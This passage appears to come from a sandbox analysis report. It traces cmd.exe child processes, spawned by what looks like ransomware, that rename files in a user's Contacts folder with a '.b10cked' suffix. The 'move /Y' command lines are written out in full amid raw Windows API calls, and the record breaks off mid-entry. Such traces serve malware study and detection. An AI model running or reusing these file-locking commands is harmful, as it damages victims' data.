lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegCloseKey (hKey=0x40) returned 0x0 [0219.521] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e81c | out: phkResult=0x22e81c*=0x40) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x40, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x1, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x0, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x4, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x4) returned 0x0 [0219.521] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e824, lpData=0x22e828, lpcbData=0x22e820*=0x1000 | out: lpType=0x22e824*=0x0, lpData=0x22e828*=0x9, lpcbData=0x22e820*=0x1000) returned 0x2 [0219.521] RegCloseKey (hKey=0x40) returned 0x0 [0219.521] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b5 [0219.521] srand (_Seed=0x5b8863b5) [0219.521] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" [0219.521] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked\"" [0219.521] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2c18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0219.522] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0219.522] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0219.522] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0219.522] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0219.522] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0219.522] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0219.522] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0219.522] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0219.522] GetEnvironmentStringsW () returned 0x2c22d0* [0219.522] FreeEnvironmentStringsW (penv=0x2c22d0) returned 1 [0219.522] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.522] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0219.522] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0219.522] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0219.522] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0219.522] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0219.522] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0219.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0219.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f5e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.522] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f5e8, lpFilePart=0x22f5e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f5e4*="Desktop") returned 0x18 [0219.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f364 | out: lpFindFileData=0x22f364) returned 0x2c0010 [0219.523] FindClose (in: hFindFile=0x2c0010 | out: hFindFile=0x2c0010) returned 1 [0219.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0219.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0219.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0219.523] GetEnvironmentStringsW () returned 0x2c2af0* [0219.524] FreeEnvironmentStringsW (penv=0x2c2af0) returned 1 [0219.524] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.524] GetConsoleOutputCP () returned 0x1b5 [0219.528] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.528] GetUserDefaultLCID () returned 0x409 [0219.528] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f728, cchData=128 | out: lpLCData="0") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f728, cchData=128 | out: lpLCData="1") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0219.529] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0219.529] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0219.530] GetConsoleTitleW (in: lpConsoleTitle=0x2b08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.531] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0219.531] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0219.531] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0219.532] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0219.538] _wcsicmp (_String1="move", _String2=")") returned 68 [0219.538] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0219.538] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0219.538] _wcsicmp (_String1="IF", _String2="move") returned -4 [0219.538] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0219.538] _wcsicmp (_String1="REM", _String2="move") returned 5 [0219.538] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0219.540] GetConsoleTitleW (in: lpConsoleTitle=0x22f420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0219.544] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CD") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="REN") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="SET") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0219.544] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0219.544] _wcsicmp (_String1="move", _String2="MD") returned 11 [0219.544] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0219.544] _wcsicmp (_String1="move", _String2="RD") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0219.544] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0219.544] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0219.544] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0219.544] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="VER") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0219.544] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0219.544] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0219.544] _wcsicmp (_String1="move", _String2="START") returned -6 [0219.544] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0219.544] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0219.544] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0219.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.546] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0219.546] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x22f1dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x22f1d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22f1d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0219.546] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0219.547] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0219.547] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0219.547] _wcsicmp (_String1="MNEUCU~1.CON", _String2=".") returned 63 [0219.547] _wcsicmp (_String1="MNEUCU~1.CON", _String2="..") returned 63 [0219.547] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\mneucu~1.con")) returned 0x20 [0219.548] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0219.548] SetErrorMode (uMode=0x0) returned 0x0 [0219.548] SetErrorMode (uMode=0x1) returned 0x0 [0219.548] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", nBufferLength=0x104, lpBuffer=0x22eb64, lpFilePart=0x22eb4c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", lpFilePart=0x22eb4c*="MNEUCU~1.CON") returned 0x26 [0219.548] SetErrorMode (uMode=0x0) returned 0x1 [0219.548] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0219.548] _wcsicmp (_String1="MNEUCU~1.CON", _String2=".") returned 63 [0219.548] _wcsicmp (_String1="MNEUCU~1.CON", _String2="..") returned 63 [0219.548] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\mneucu~1.con")) returned 0x20 [0219.548] SetErrorMode (uMode=0x0) returned 0x0 [0219.548] SetErrorMode (uMode=0x1) returned 0x0 [0219.548] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", nBufferLength=0x104, lpBuffer=0x22efe0, lpFilePart=0x22ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", lpFilePart=0x22ed78*="MNEUCU~1.CON") returned 0x26 [0219.548] SetErrorMode (uMode=0x0) returned 0x1 [0219.549] SetErrorMode (uMode=0x0) returned 0x0 [0219.549] SetErrorMode (uMode=0x1) returned 0x0 [0219.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", nBufferLength=0x104, lpBuffer=0x22f1e8, lpFilePart=0x22ed78 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", lpFilePart=0x22ed78*="mneuc uhnfghgg.contact.b10cked") returned 0x38 [0219.549] SetErrorMode (uMode=0x0) returned 0x1 [0219.549] SetLastError (dwErrCode=0x0) [0219.549] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.b10cked")) returned 0xffffffff [0219.549] GetLastError () returned 0x2 [0219.549] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", fInfoLevelId=0x1, lpFindFileData=0x22e6f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22e6f4) returned 0x2b0e68 [0219.549] FindNextFileW (in: hFindFile=0x2b0e68, lpFindFileData=0x22e6f4 | out: lpFindFileData=0x22e6f4) returned 0 [0219.549] GetLastError () returned 0x12 [0219.549] FindClose (in: hFindFile=0x2b0e68 | out: hFindFile=0x2b0e68) returned 1 [0219.550] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\MNEUCU~1.CON", fInfoLevelId=0x1, lpFindFileData=0x2c1bd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1bd8) returned 0x2b0e68 [0219.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", nBufferLength=0x104, lpBuffer=0x22e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked", lpFilePart=0x0) returned 0x38 [0219.550] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", nBufferLength=0x104, lpBuffer=0x22e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact", lpFilePart=0x0) returned 0x30 [0219.550] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact")) returned 0x20 [0219.550] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact"), lpNewFileName="C:\\Users\\EEBsYm5\\Contacts\\mneuc uhnfghgg.contact.b10cked" (normalized: "c:\\users\\eebsym5\\contacts\\mneuc uhnfghgg.contact.b10cked"), dwFlags=0x3) returned 1 [0219.551] FindClose (in: hFindFile=0x2b0e68 | out: hFindFile=0x2b0e68) returned 1 [0219.551] _vsnwprintf (in: _Buffer=0x4a1e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x22e940 | out: _Buffer=" 1") returned 9 [0219.551] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.551] GetFileType (hFile=0x7) returned 0x2 [0219.632] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0219.632] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22e8cc | out: lpMode=0x22e8cc) returned 1 [0219.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.632] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x22e900 | out: lpConsoleScreenBufferInfo=0x22e900) returned 1 [0219.632] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0219.633] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a1f4640, nSize=0x2000, Arguments=0x22e940 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0219.633] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a1f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x22e924, lpReserved=0x0 | out: lpBuffer=0x4a1f4640*, lpNumberOfCharsWritten=0x22e924*=0x1a) returned 1 [0219.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.633] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0219.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0219.633] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0219.633] _get_osfhandle (_FileHandle=0) returned 0x3 [0219.633] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: lpMode=0x4a1e41b0) returned 1 [0219.633] SetConsoleInputExeNameW () returned 0x1 [0219.634] GetConsoleOutputCP () returned 0x1b5 [0219.634] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0219.634] SetThreadUILanguage (LangId=0x0) returned 0x409 [0219.634] exit (_Code=0) Process: id = "569" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xf14" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32806 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32807 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 32808 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 32809 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 32810 start_va = 0x4a1c0000 end_va = 0x4a20bfff entry_point = 0x4a1c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32811 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32812 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32813 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 